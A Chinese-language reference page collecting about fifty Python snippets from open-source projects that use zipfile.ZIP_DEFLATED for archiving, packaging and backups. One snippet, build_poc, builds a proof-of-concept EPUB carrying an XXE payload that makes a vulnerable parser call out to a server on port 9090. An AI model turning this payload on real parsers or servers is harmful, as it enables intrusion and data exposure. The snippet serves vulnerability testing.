我们从Python开源项目中,提取了以下50个代码示例,用于说明如何使用zipfile.ZIP_DEFLATED。
def zipdir(archivename, basedir): '''Zip directory, from J.F. Sebastian http://stackoverflow.com/''' assert os.path.isdir(basedir) with closing(ZipFile(archivename, "w", ZIP_DEFLATED)) as z: for root, dirs, files in os.walk(basedir): #NOTE: ignore empty directories for fn in files: if fn[-4:]!='.zip': absfn = os.path.join(root, fn) zfn = absfn[len(basedir)+len(os.sep):] #XXX: relative path z.write(absfn, zfn) # ================ Inventory input data and create data structure =================
def pickle_load(path, compression=False): """Unpickle a possible compressed pickle. Parameters ---------- path: str path to the output file compression: bool if true assumes that pickle was compressed when created and attempts decompression. Returns ------- obj: object the unpickled object """ if compression: with zipfile.ZipFile(path, "r", compression=zipfile.ZIP_DEFLATED) as myzip: with myzip.open("data") as f: return pickle.load(f) else: with open(path, "rb") as f: return pickle.load(f)
def prepare_zip(): from pkg_resources import resource_filename as resource from config import config from json import dumps logger.info('creating/updating gimel.zip') with ZipFile('gimel.zip', 'w', ZIP_DEFLATED) as zipf: info = ZipInfo('config.json') info.external_attr = 0o664 << 16 zipf.writestr(info, dumps(config)) zipf.write(resource('gimel', 'config.py'), 'config.py') zipf.write(resource('gimel', 'gimel.py'), 'gimel.py') zipf.write(resource('gimel', 'logger.py'), 'logger.py') for root, dirs, files in os.walk(resource('gimel', 'vendor')): for file in files: real_file = os.path.join(root, file) relative_file = os.path.relpath(real_file, resource('gimel', '')) zipf.write(real_file, relative_file)
def reseed(self, netdb): """Compress netdb entries and set content""" zip_file = io.BytesIO() dat_files = [] for root, dirs, files in os.walk(netdb): for f in files: if f.endswith(".dat"): # TODO check modified time # may be not older than 10h dat_files.append(os.path.join(root, f)) if len(dat_files) == 0: raise PyseederException("Can't get enough netDb entries") elif len(dat_files) > 75: dat_files = random.sample(dat_files, 75) with ZipFile(zip_file, "w", compression=ZIP_DEFLATED) as zf: for f in dat_files: zf.write(f, arcname=os.path.split(f)[1]) self.FILE_TYPE = 0x00 self.CONTENT_TYPE = 0x03 self.CONTENT = zip_file.getvalue() self.CONTENT_LENGTH = len(self.CONTENT)
def __zip_function__(self): """ Zip source code :return: """ PrintMsg.cmd('{}'.format( os.path.join(self.path, self.zip_name)), 'ARCHIVING') zipf = zipfile.ZipFile( os.path.join(self.path, self.zip_name), 'w', zipfile.ZIP_DEFLATED) if self.virtual_env: env_path = self.virtual_env for root, dirs, files in os.walk(self.virtual_env): for d in dirs: if d == 'site-packages': env_path = os.path.join(root, d) Lambda.zip_add_dir(env_path, zipf) if len(self.libraries) > 0: for lib in self.libraries: Lambda.zip_add_dir(lib, zipf, True) zipf.write(os.path.join(self.path, self.function), self.function) zipf.close()
def load_full_log(self, filename, user=None, uid=None): if isinstance(user, User): user = user elif uid: user = User.objects.get(id=uid) else: user = self.user if user: if self._lists: self.file = self._lists.get(filename=filename) else: self.file = TermLog.objects.get(filename=filename) if self.file.logPath == 'locale': return self.file.log else: try: zf = zipfile.ZipFile(self.file.logPath, 'r', zipfile.ZIP_DEFLATED) zf.setpassword(self.file.logPWD) self._data = zf.read(zf.namelist()[0]) return self._data except KeyError: return 'ERROR: Did not find %s file' % filename return 'ERROR User(None)'
def ZipFiles(targetdir, ziparchivename): '''Create a zip archive of all files in the target directory. ''' #os.chdir(targetdir) myzip = zipfile.ZipFile(ziparchivename, "w", zipfile.ZIP_DEFLATED) if type(targetdir) == str: for root, dirs, files in os.walk(targetdir): for fname in files: if fname != ziparchivename: myzip.write(os.path.join(root,fname)) if type(targetdir) == list: for fname in targetdir: myzip.write(fname) myzip.close() myzip = zipfile.ZipFile(ziparchivename, "r", zipfile.ZIP_DEFLATED) if myzip.testzip() != None: print "Warning: Zipfile did not pass check." myzip.close()
def createZipWithProgress(zippath, files): """Same as function createZip() but has a stdout progress bar which is useful for commandline work :param zippath: the file path for the zip file :type zippath: str :param files: A Sequence of file paths that will be archived. :type files: seq(str) """ dir = os.path.dirname(zippath) if not os.path.exists(os.path.join(dir, os.path.dirname(zippath))): os.makedirs(os.path.join(dir, os.path.dirname(zippath))) logger.debug("writing file: {}".format(zippath)) length = len(files) progressBar = commandline.CommandProgressBar(length, prefix='Progress:', suffix='Complete', barLength=50) progressBar.start() with zipfile.ZipFile(zippath, "w", zipfile.ZIP_DEFLATED) as archive: for p in iter(files): logger.debug("Archiving file: {} ----> :{}\n".format(p[0], p[1])) archive.write(p[0], p[1]) progressBar.increment(1) logger.debug("finished writing zip file to : {}".format(zippath))
def format(self, parts, events, filename, *args): prefix, ext = os.path.splitext(filename) if ext.lower() == ".zip": zip_name = filename raw_name = prefix else: zip_name = filename + ".zip" raw_name = filename data = self.formatter.format(parts, events, *args) memfile = StringIO() zipped = zipfile.ZipFile(memfile, 'w', zipfile.ZIP_DEFLATED) zipped.writestr(raw_name, data.encode("utf-8")) zipped.close() memfile.flush() memfile.seek(0) part = MIMEBase("application", "zip") part.set_payload(memfile.read()) encode_base64(part) part.add_header("Content-Disposition", "attachment", filename=zip_name) parts.append(part) return u""
def makeZipFiles(self): self._makebigfile('bigfile.zip', zipfile.ZIP_STORED) zf2=zipfile.ZipFile('littlefiles.zip', 'w') try: os.mkdir('zipstreamdir') except EnvironmentError: pass for i in range(1000): fn='zipstreamdir/%d' % i stuff(fn, '') zf2.write(fn) zf2.close() self._makebigfile('bigfile_deflated.zip', zipfile.ZIP_DEFLATED) self.cleanupUnzippedJunk()
def create_zip_file(self, file_name, args): # Set generic lambda function name function_name = file_name + '.py' # Copy file to avoid messing with the repo files # We have to rename because the function name afects the handler name shutil.copy(Config.dir_path + '/lambda/scarsupervisor.py', function_name) # Zip the function file with zipfile.ZipFile(Config.zip_file_path, 'w', zipfile.ZIP_DEFLATED) as zf: # Lambda function code zf.write(function_name) # Udocker script code zf.write(Config.dir_path + '/lambda/udocker', 'udocker') # Udocker libs zf.write(Config.dir_path + '/lambda/udocker-1.1.0-RC2.tar.gz', 'udocker-1.1.0-RC2.tar.gz') os.remove(function_name) if hasattr(args, 'script') and args.script: zf.write(args.script, 'init_script.sh') Config.lambda_env_variables['Variables']['INIT_SCRIPT_PATH'] = "/var/task/init_script.sh" if hasattr(args, 'extra_payload') and args.extra_payload: self.zipfolder(Config.zip_file_path, args.extra_payload) Config.lambda_env_variables['Variables']['EXTRA_PAYLOAD'] = "/var/task/extra/" # Return the zip as an array of bytes with open(Config.zip_file_path, 'rb') as f: return f.read()
def backup_theme(self, themename): '''backup a colortheme to a zipfile''' import zipfile backup_path = xbmcgui.Dialog().browse(3, self.addon.getLocalizedString(32029), "files").decode("utf-8") if backup_path: xbmc.executebuiltin("ActivateWindow(busydialog)") backup_name = u"%s ColorTheme - %s" % (get_skin_name().capitalize(), themename) backupfile = os.path.join(backup_path, backup_name + u".zip") zip_temp = u'special://temp/%s.zip' % backup_name xbmcvfs.delete(zip_temp) xbmcvfs.delete(backupfile) zip_temp = xbmc.translatePath(zip_temp).decode("utf-8") zip_file = zipfile.ZipFile(zip_temp, "w", zipfile.ZIP_DEFLATED) abs_src = os.path.abspath(xbmc.translatePath(self.userthemes_path).decode("utf-8")) for filename in xbmcvfs.listdir(self.userthemes_path)[1]: if (filename.startswith("%s_" % themename) or filename.replace(".theme", "").replace(".jpg", "") == themename): filename = filename.decode("utf-8") filepath = xbmc.translatePath(self.userthemes_path + filename).decode("utf-8") absname = os.path.abspath(filepath) arcname = absname[len(abs_src) + 1:] zip_file.write(absname, arcname) zip_file.close() xbmcvfs.copy(zip_temp, backupfile) xbmc.executebuiltin("Dialog.Close(busydialog)")
def run(): urls = [ x.strip() for x in URLS.strip().splitlines() if x.strip() and not x.strip().startswith('#') ] with tempfile.TemporaryDirectory(prefix='symbols') as tmpdirname: downloaded = download_all(urls, tmpdirname) save_filepath = 'symbols-for-systemtests.zip' total_time_took = 0.0 total_size = 0 with zipfile.ZipFile(save_filepath, mode='w') as zf: for uri, (fullpath, time_took, size) in downloaded.items(): total_time_took += time_took total_size += size if fullpath: path = uri.replace('v1/', '') assert os.path.isfile(fullpath) zf.write( fullpath, arcname=path, compress_type=zipfile.ZIP_DEFLATED, )
def _upload(self, filename): fp = IOStream() zipped = zipfile.ZipFile(fp, 'w', zipfile.ZIP_DEFLATED) zipped.write(filename, os.path.split(filename)[1]) zipped.close() content = base64.encodestring(fp.getvalue()) if not isinstance(content, str): content = content.decode('utf-8') try: return self._execute(Command.UPLOAD_FILE, {'file': content})['value'] except WebDriverException as e: if "Unrecognized command: POST" in e.__str__(): return filename elif "Command not found: POST " in e.__str__(): return filename elif '{"status":405,"value":["GET","HEAD","DELETE"]}' in e.__str__(): return filename else: raise e
def plaintext2zip(self, file_name, subdirname, plaintext): file_name=file_name.split('.')[0] plaintext_file_name = STATIC_PLAINTEXT_ARTICLES_DIR+subdirname+'/'+file_name+'.txt' zip_file_name = STATIC_PLAINTEXT_ARTICLES_DIR+subdirname+'/'+file_name+'.zip' if not os.path.exists(STATIC_PLAINTEXT_ARTICLES_DIR+subdirname): os.makedirs(STATIC_PLAINTEXT_ARTICLES_DIR+subdirname) with codecs.open(plaintext_file_name, 'w', encoding='utf8') as outfile: outfile.write(plaintext) outfile.flush() outfile.close() zf = zipfile.ZipFile(zip_file_name, mode='w', compression=zipfile.ZIP_DEFLATED) try: zf.write(plaintext_file_name, os.path.basename(plaintext_file_name)) os.remove(plaintext_file_name) except Exception, e: print e logging.error('zip error %s ' % plaintext_file_name) finally: zf.close()
def make_archive(folderpath, archive): """ Create zip with path *archive from folder with path *folderpath """ file_list = get_absolute_file_paths(folderpath) with zipfile.ZipFile(archive, 'w', zipfile.ZIP_DEFLATED) as zip_file: for addon_file in file_list: path_list = re.split(r'[\\/]', addon_file) rel_path = os.path.relpath(addon_file, folderpath) if ".git" in path_list: continue if rel_path.startswith("media") and not rel_path.endswith(".xbt"): continue if rel_path.startswith("themes"): continue if addon_file.endswith(('.pyc', '.pyo', '.zip')): continue if addon_file.startswith(('.')): continue zip_file.write(addon_file, rel_path) logging.warning("zipped %s" % rel_path)
def updateZip(zipname, filename, data): # generate a temp file tmpfd, tmpname = tempfile.mkstemp(dir=os.path.dirname(zipname)) os.close(tmpfd) # create a temp copy of the archive without filename with zipfile.ZipFile(zipname, 'r') as zin: with zipfile.ZipFile(tmpname, 'w') as zout: zout.comment = zin.comment # preserve the comment for item in zin.infolist(): if item.filename != filename: zout.writestr(item, zin.read(item.filename)) # replace with the temp archive os.remove(zipname) os.rename(tmpname, zipname) # now add filename with its new data with zipfile.ZipFile(zipname, mode='a', compression=zipfile.ZIP_DEFLATED) as zf: zf.writestr(filename, data)
def _ArchiveOutputDir(self): """Archive all files in the output dir, and return as compressed bytes.""" with io.BytesIO() as archive: with zipfile.ZipFile(archive, 'w', zipfile.ZIP_DEFLATED) as contents: num_files = 0 for absdir, _, files in os.walk(self._output_dir): reldir = os.path.relpath(absdir, self._output_dir) for filename in files: src_path = os.path.join(absdir, filename) # We use normpath to turn './file.txt' into just 'file.txt'. dst_path = os.path.normpath(os.path.join(reldir, filename)) contents.write(src_path, dst_path) num_files += 1 if num_files: logging.info('%d files in the output dir were archived.', num_files) else: logging.warning('No files in the output dir. Archive is empty.') return archive.getvalue()
def _write_zip(self): try: file = zipfile.ZipFile(self.filename,"w",zipfile.ZIP_DEFLATED) except IOError as msg: errmsg = "%s\n%s" % (_("Could not create %s") % self.filename, msg) raise ReportError(errmsg) except: raise ReportError(_("Could not create %s") % self.filename) file.write(self.manifest_xml,str("META-INF/manifest.xml")) file.write(self.content_xml,str("content.xml")) file.write(self.meta_xml,str("meta.xml")) file.write(self.styles_xml,str("styles.xml")) file.write(self.mimetype,str("mimetype")) file.close() os.unlink(self.manifest_xml) os.unlink(self.content_xml) os.unlink(self.meta_xml) os.unlink(self.styles_xml)
def dir2zip(in_dir, zip_fname): """ Make a zip file `zip_fname` with contents of directory `in_dir` The recorded filenames are relative to `in_dir`, so doing a standard zip unpack of the resulting `zip_fname` in an empty directory will result in the original directory contents. Parameters ---------- in_dir : str Directory path containing files to go in the zip archive zip_fname : str Filename of zip archive to write """ z = zipfile.ZipFile(zip_fname, 'w', compression=zipfile.ZIP_DEFLATED) for root, dirs, files in os.walk(in_dir): for file in files: fname = os.path.join(root, file) out_fname = os.path.relpath(fname, in_dir) z.write(os.path.join(root, file), out_fname) z.close()
def assemble_my_parts(self): """Assemble the `self.parts` dictionary. Extend in subclasses. """ writers.Writer.assemble_parts(self) f = tempfile.NamedTemporaryFile() zfile = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED) self.write_zip_str(zfile, 'mimetype', self.MIME_TYPE, compress_type=zipfile.ZIP_STORED) content = self.visitor.content_astext() self.write_zip_str(zfile, 'content.xml', content) s1 = self.create_manifest() self.write_zip_str(zfile, 'META-INF/manifest.xml', s1) s1 = self.create_meta() self.write_zip_str(zfile, 'meta.xml', s1) s1 = self.get_stylesheet() self.write_zip_str(zfile, 'styles.xml', s1) self.store_embedded_files(zfile) self.copy_from_stylesheet(zfile) zfile.close() f.seek(0) whole = f.read() f.close() self.parts['whole'] = whole self.parts['encoding'] = self.document.settings.output_encoding self.parts['version'] = docutils.__version__
def build_poc(server): xxe = """<?xml version="1.0"?> <!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://%s:9090/">]> <container version="1.0" xmlns="urn:oasis:names:tc:opendocument:xmlns:container"> <rootfiles> <rootfile full-path="content.opf" media-type="application/oebps-package+xml">&xxe;</rootfile> </rootfiles> </container>""" % server f = StringIO() z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED) zipinfo = zipfile.ZipInfo("META-INF/container.xml") zipinfo.external_attr = 0777 << 16L z.writestr(zipinfo, xxe) z.close() epub = open('poc.epub','wb') epub.write(f.getvalue()) epub.close()
def build_zip(self, pathname, archive_paths): with ZipFile(pathname, 'w', zipfile.ZIP_DEFLATED) as zf: for ap, p in archive_paths: logger.debug('Wrote %s to %s in wheel', p, ap) zf.write(p, ap)
def make_zipfile(zip_filename, base_dir, verbose=0, dry_run=0, compress=True, mode='w'): """Create a zip file from all the files under 'base_dir'. The output zip file will be named 'base_dir' + ".zip". Uses either the "zipfile" Python module (if available) or the InfoZIP "zip" utility (if installed and found on the default search path). If neither tool is available, raises DistutilsExecError. Returns the name of the output zip file. """ import zipfile mkpath(os.path.dirname(zip_filename), dry_run=dry_run) log.info("creating '%s' and adding '%s' to it", zip_filename, base_dir) def visit(z, dirname, names): for name in names: path = os.path.normpath(os.path.join(dirname, name)) if os.path.isfile(path): p = path[len(base_dir) + 1:] if not dry_run: z.write(path, p) log.debug("adding '%s'", p) compression = zipfile.ZIP_DEFLATED if compress else zipfile.ZIP_STORED if not dry_run: z = zipfile.ZipFile(zip_filename, mode, compression=compression) for dirname, dirs, files in os.walk(base_dir): visit(z, dirname, files) z.close() else: for dirname, dirs, files in os.walk(base_dir): visit(None, dirname, files) return zip_filename
def create_zip(cls, fname): example_file = fname + ".txt" zip_file = fname + ".zip" touch(example_file) zfh = zipfile.ZipFile(fname + ".zip", 'w', zipfile.ZIP_DEFLATED) zfh.write(example_file) zfh.close() os.remove(example_file) return zip_file
def archive(cls, path): """Creates a zip file containing the given directory. :param path: Path to the archived directory. :return: """ import zipfile dir_name = os.path.basename(path) zip_path = os.path.join(tempfile.gettempdir(), '%s.zip' % dir_name) parent_path = os.path.dirname(path) + '/' z = zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED, allowZip64=True) try: for current_dir_path, dir_names, file_names in os.walk(path): for dir_name in dir_names: dir_path = os.path.join(current_dir_path, dir_name) arch_path = dir_path[len(parent_path):] z.write(dir_path, arch_path) for file_name in file_names: file_path = os.path.join(current_dir_path, file_name) arch_path = file_path[len(parent_path):] z.write(file_path, arch_path) finally: z.close() return zip_path
def make_zipfile(zip_filename, base_dir, verbose=0, dry_run=0, compress=True, mode='w'): """Create a zip file from all the files under 'base_dir'. The output zip file will be named 'base_dir' + ".zip". Uses either the "zipfile" Python module (if available) or the InfoZIP "zip" utility (if installed and found on the default search path). If neither tool is available, raises DistutilsExecError. Returns the name of the output zip file. """ import zipfile mkpath(os.path.dirname(zip_filename), dry_run=dry_run) log.info("creating '%s' and adding '%s' to it", zip_filename, base_dir) def visit(z, dirname, names): for name in names: path = os.path.normpath(os.path.join(dirname, name)) if os.path.isfile(path): p = path[len(base_dir) + 1:] if not dry_run: z.write(path, p) log.debug("adding '%s'", p) compression = zipfile.ZIP_DEFLATED if compress else zipfile.ZIP_STORED if not dry_run: z = zipfile.ZipFile(zip_filename, mode, compression=compression) for dirname, dirs, files in sorted_walk(base_dir): visit(z, dirname, files) z.close() else: for dirname, dirs, files in sorted_walk(base_dir): visit(None, dirname, files) return zip_filename
def make_archive(self, path): """Create archive of directory and write to ``path``. :param path: Path to archive Ignored:: * build/\* - This is used for packing the charm itself and any similar tasks. * \*/.\* - Hidden files are all ignored for now. This will most likely be changed into a specific ignore list (.bzr, etc) """ zf = zipfile.ZipFile(path, 'w', zipfile.ZIP_DEFLATED) for dirpath, dirnames, filenames in os.walk(self.path): relative_path = dirpath[len(self.path) + 1:] if relative_path and not self._ignore(relative_path): zf.write(dirpath, relative_path) for name in filenames: archive_name = os.path.join(relative_path, name) if not self._ignore(archive_name): real_path = os.path.join(dirpath, name) self._check_type(real_path) if os.path.islink(real_path): self._check_link(real_path) self._write_symlink( zf, os.readlink(real_path), archive_name) else: zf.write(real_path, archive_name) zf.close() return path
def load(path, num_cpu=16): with open(path, "rb") as f: model_data, act_params = dill.load(f) act = deepq.build_act(**act_params) sess = U.make_session(num_cpu=num_cpu) sess.__enter__() with tempfile.TemporaryDirectory() as td: arc_path = os.path.join(td, "packed.zip") with open(arc_path, "wb") as f: f.write(model_data) zipfile.ZipFile(arc_path, 'r', zipfile.ZIP_DEFLATED).extractall(td) U.load_state(os.path.join(td, "model")) return ActWrapper(act, act_params)
def relatively_safe_pickle_dump(obj, path, compression=False): """This is just like regular pickle dump, except from the fact that failure cases are different: - It's never possible that we end up with a pickle in corrupted state. - If a there was a different file at the path, that file will remain unchanged in the even of failure (provided that filesystem rename is atomic). - it is sometimes possible that we end up with useless temp file which needs to be deleted manually (it will be removed automatically on the next function call) The indended use case is periodic checkpoints of experiment state, such that we never corrupt previous checkpoints if the current one fails. Parameters ---------- obj: object object to pickle path: str path to the output file compression: bool if true pickle will be compressed """ temp_storage = path + ".relatively_safe" if compression: # Using gzip here would be simpler, but the size is limited to 2GB with tempfile.NamedTemporaryFile() as uncompressed_file: pickle.dump(obj, uncompressed_file) with zipfile.ZipFile(temp_storage, "w", compression=zipfile.ZIP_DEFLATED) as myzip: myzip.write(uncompressed_file.name, "data") else: with open(temp_storage, "wb") as f: pickle.dump(obj, f) os.rename(temp_storage, path)
def backup_mysql(): try: back_file_name = database_name+time.strftime("%Y%m%d_%H%M%S", time.localtime()) back_file_path = os.path.join(backup_dir,back_file_name) backup_command= '%s -h%s -P%d -u%s -p%s --default-character-set=utf8 %s > %s'\ %(mysql_dump,mysql_host,int(mysql_port),mysql_user,mysql_pass,database_name,back_file_path) if os.system(backup_command) == 0: zip_file_path = back_file_path+'.zip' f = zipfile.ZipFile(zip_file_path, 'w' ,zipfile.ZIP_DEFLATED,allowZip64=True) f.write(back_file_path,back_file_name) f.close() md5_num = str(md5sum(zip_file_path)) md5_file_path = zip_file_path+'_'+md5_num back_file_new_path = os.path.join(backup_dir,md5_file_path) os.rename(zip_file_path,back_file_new_path) os.remove(back_file_path) data = {'status':'back_success','file_path':back_file_new_path,'md5':md5_num} return data else: data = {'status':'back_failed'} return data except Exception, e: print e data = {'status':'back_failed'} return data
def refresh_lambda_zip(lambda_files, lambda_dir): with zipfile.ZipFile(temp_deploy_zip, "w", zipfile.ZIP_DEFLATED) as zf: for f in lambda_files: zf.write(lambda_dir + '/' + f, basename(f))
def archive(self, build_dir): assert self.source_dir create_archive = True archive_name = '%s-%s.zip' % (self.name, self.installed_version) archive_path = os.path.join(build_dir, archive_name) if os.path.exists(archive_path): response = ask_path_exists( 'The file %s exists. (i)gnore, (w)ipe, (b)ackup ' % display_path(archive_path), ('i', 'w', 'b')) if response == 'i': create_archive = False elif response == 'w': logger.warn('Deleting %s' % display_path(archive_path)) os.remove(archive_path) elif response == 'b': dest_file = backup_dir(archive_path) logger.warn('Backing up %s to %s' % (display_path(archive_path), display_path(dest_file))) shutil.move(archive_path, dest_file) if create_archive: zip = zipfile.ZipFile(archive_path, 'w', zipfile.ZIP_DEFLATED) dir = os.path.normcase(os.path.abspath(self.source_dir)) for dirpath, dirnames, filenames in os.walk(dir): if 'pip-egg-info' in dirnames: dirnames.remove('pip-egg-info') for dirname in dirnames: dirname = os.path.join(dirpath, dirname) name = self._clean_zip_name(dirname, dir) zipdir = zipfile.ZipInfo(self.name + '/' + name + '/') zipdir.external_attr = 0x1ED << 16 # 0o755 zip.writestr(zipdir, '') for filename in filenames: if filename == PIP_DELETE_MARKER_FILENAME: continue filename = os.path.join(dirpath, filename) name = self._clean_zip_name(filename, dir) zip.write(filename, self.name + '/' + name) zip.close() logger.indent -= 2 logger.notify('Saved %s' % display_path(archive_path))
def make_zipfile(zip_filename, base_dir, verbose=0, dry_run=0, compress=None, mode='w' ): """Create a zip file from all the files under 'base_dir'. The output zip file will be named 'base_dir' + ".zip". Uses either the "zipfile" Python module (if available) or the InfoZIP "zip" utility (if installed and found on the default search path). If neither tool is available, raises DistutilsExecError. Returns the name of the output zip file. """ import zipfile mkpath(os.path.dirname(zip_filename), dry_run=dry_run) log.info("creating '%s' and adding '%s' to it", zip_filename, base_dir) def visit(z, dirname, names): for name in names: path = os.path.normpath(os.path.join(dirname, name)) if os.path.isfile(path): p = path[len(base_dir)+1:] if not dry_run: z.write(path, p) log.debug("adding '%s'" % p) if compress is None: compress = (sys.version>="2.4") # avoid 2.3 zipimport bug when 64 bits compression = [zipfile.ZIP_STORED, zipfile.ZIP_DEFLATED][bool(compress)] if not dry_run: z = zipfile.ZipFile(zip_filename, mode, compression=compression) for dirname, dirs, files in os.walk(base_dir): visit(z, dirname, files) z.close() else: for dirname, dirs, files in os.walk(base_dir): visit(None, dirname, files) return zip_filename #
def GetZipWith(fname, content): fp = StringIO.StringIO() zf = zipfile.ZipFile(fp, "a", zipfile.ZIP_DEFLATED, False) zf.writestr(fname, content) zf.close() return fp.getvalue()
def save_files_in_zip(): """saves created files in zip file""" if not CREATED_FILES: output_line('-- nothing to zip') else: zip_name = os.path.join(SCHEMA_DIR + '.zip') output_line('creating zip %s ...' % (zip_name)) zip_f = zipfile.ZipFile(zip_name, 'w', zipfile.ZIP_DEFLATED) for fn in CREATED_FILES: fne = fn.encode(OUT_FILE_ENCODING) #print('storing %s...' % (fne)) zip_f.write(fne) os.remove(fne) zip_f.close() clean_up()
def archive_dir(source, arcname, target, arc_time): # Set the filename and destination. arcname = str(arc_time)+'_'+arcname+'.zip' # Archive filename target = str(target+'/'+arcname) # Path to storage... dirs = [str(source)] # Set initial "root" directories to pop. zipObj = zipfile.ZipFile(target,'w',zipfile.ZIP_DEFLATED) try: while dirs: # Loop through and get all sub dirs and files. dir_list=dirs.pop(0) # pop next dir. try: for items in os.listdir(dir_list+'/'): if os.path.isdir(dir_list+'/'+items): # Collect sub dirs for pop. dirs+=[dir_list+'/'+items] elif os.path.isfile(dir_list+'/'+items): # Ignor the archive file if in the dir structure. if items.lower() == arcname: continue if items.lower()[:3] == 'ini': continue #task directory filter. # Write to the zip. zipObj.write(str(dir_list+'/'+items),None,None) except: pass # Ignor non-accessable directories! zipObj.close() return 1 # Success... except Exception, error: return error # Backup failed... #//////////////////////////////////////////////////////> # CONFIGURATION AND PATH SETUPS #//////////////////////////////////////////////////////> # SPECIFY SOURCE PATHS; add as many as you like. # Don't forget to add these to the SOURCE_PATH list below.
def append(self, pathAndFileName): """ adding a file or a path (recursive) to the zip archive in memory """ zf = zipfile.ZipFile(self.inMemory, "a", zipfile.ZIP_DEFLATED, False) if os.path.isfile(pathAndFileName): zf.write(pathAndFileName) else: path = pathAndFileName for root, folders, files in os.walk(path): for file in files: fullName = os.path.join(root, file) zf.write(fullName)
def create_update_archive(archive_path): zp = zipfile.ZipFile(archive_path, 'w', compression=zipfile.ZIP_DEFLATED) files_list = create_app_update_list() abs_path = env_mode.get_current_path() for fl in files_list: fl_rep = fl.replace zp.write(fl, arcname=fl_rep(abs_path, '')) zp.close()
def _zip_factory(self, filename): """create a ZipFile Object with compression and allow big ZIP files (allowZip64)""" try: import zlib assert zlib zip_compression= zipfile.ZIP_DEFLATED except Exception as ex: zip_compression= zipfile.ZIP_STORED _zip = zipfile.ZipFile(file=filename, mode='w', compression=zip_compression, allowZip64=True) return _zip
def make_wheelfile_inner(base_name, base_dir='.'): """Create a whl file from all the files under 'base_dir'. Places .dist-info at the end of the archive.""" zip_filename = base_name + ".whl" log.info("creating '%s' and adding '%s' to it", zip_filename, base_dir) # XXX support bz2, xz when available zip = zipfile.ZipFile(open(zip_filename, "wb+"), "w", compression=zipfile.ZIP_DEFLATED) score = {'WHEEL': 1, 'METADATA': 2, 'RECORD': 3} deferred = [] def writefile(path): zip.write(path, path) log.info("adding '%s'" % path) for dirpath, dirnames, filenames in os.walk(base_dir): for name in filenames: path = os.path.normpath(os.path.join(dirpath, name)) if os.path.isfile(path): if dirpath.endswith('.dist-info'): deferred.append((score.get(name, 0), path)) else: writefile(path) deferred.sort() for score, path in deferred: writefile(path) zip.close() return zip_filename
def make_zipfile(zip_filename, base_dir, verbose=0, dry_run=0, compress=True, mode='w'): """Create a zip file from all the files under 'base_dir'. The output zip file will be named 'base_dir' + ".zip". Uses either the "zipfile" Python module (if available) or the InfoZIP "zip" utility (if installed and found on the default search path). If neither tool is available, raises DistutilsExecError. Returns the name of the output zip file. """ import zipfile mkpath(os.path.dirname(zip_filename), dry_run=dry_run) log.info("creating '%s' and adding '%s' to it", zip_filename, base_dir) def visit(z, dirname, names): for name in names: path = os.path.normpath(os.path.join(dirname, name)) if os.path.isfile(path): p = path[len(base_dir) + 1:] if not dry_run: z.write(path, p) log.debug("adding '%s'" % p) compression = zipfile.ZIP_DEFLATED if compress else zipfile.ZIP_STORED if not dry_run: z = zipfile.ZipFile(zip_filename, mode, compression=compression) for dirname, dirs, files in os.walk(base_dir): visit(z, dirname, files) z.close() else: for dirname, dirs, files in os.walk(base_dir): visit(None, dirname, files) return zip_filename